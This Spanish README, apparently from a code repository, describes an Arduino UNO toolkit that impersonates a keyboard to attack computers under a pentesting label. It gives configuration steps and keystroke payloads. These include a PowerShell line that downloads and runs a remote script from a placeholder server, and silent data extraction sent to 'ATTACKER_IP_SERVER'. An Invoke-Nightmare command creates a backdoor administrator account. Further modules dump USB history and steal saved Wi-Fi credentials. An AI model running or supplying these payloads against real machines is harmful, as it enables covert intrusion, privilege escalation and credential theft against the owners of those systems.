Pack de herramientas para pruebas de penetración en sistemas por medio de Arduino UNO.
-
Arpha Basado en extraer información organizada y silenciosamente , haciendose pasar por el teclado del dispositivo. En la linea 28 del Archivo Arpha.ino se configura la linea de comando a correr:
Y en el campo donde se encuentra 'ATTACKER_IP_SERVER' es donde se debe cambiar por la ip del servidor a enviar la petición y posteriormente su puerto especifico. -
Command Remote Powershell Logra descargar archivos remotos y ejecutarlos, sin dejar pistas por medio de powershell. Para configurar correctamente el archivo, se deberá cambiar el campo de 'https://PENTESTER_IP:PORT/File.ps1' por la dirección correcta del servidor, puerto y ruta del archivo de powershell con extensión ps1.
Keyboard.print("iex (new-object net.webclient).downloadstring('https://PENTESTER_IP:PORT/File.ps1')");
- Escalation Privileges Lista de comandos que se ejecutaran automaticamente para lograr la escalación de privilegios y crear un usuario ficticio con privilegios de Administrador. Su configuración es simple. por defecto el nombre del usuario a crear con los privilegios se llamará 'testing' y su contraseña 'cood', sin embargo estos son preferibles cambiarlos según el entorno de ataque. (Linea 37 - Escalation_Privileges.ino)
Keyboard.print("Invoke-Nightmare -NewUser 'testing' -NewPassword 'cood' -DriverName 'PrintMe'");
-
MouseController La idea de MouseController es poder crear un Mouse virtual por medio del arduino conectado, en el método loop del archivo, se encuentra su configuración al gusto propio. Por defecto esta en 0
En la función de Mouse.move, se establecen las coordenadas a mover el ratón o mouse. Para ello se necesita saber que el primer dato es el valor de la coordenada x, es decir horizontal, luego separado de una coma(,) se asgina el valor de y, es decir vertical y separado de una coma(,) se asigna el valor al mover la rueda del ratón o mouse. -
USB Report Mostrará el historial de las USBs posibles y los guardará en un archivo salida. El archivo de salida se puede cambiar (nombre de salida: output.txt):
ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Enum\USBSTOR\*\* > output.txt | Select FriendlyName >> output.txt
- Wifi El modulo de Wifi es especializado en el arte del pentesting llamado Steal Wifi Info, el cual se trata de obtener la información importante de los Access Point que han sido conectados en el objetivo.
- Al oprimir el botón , envíara el código a compilarlo
- Recibirá las ordenes y las leerá
- Enviará nuevamente las peticiones pero al dispositivo como salida.
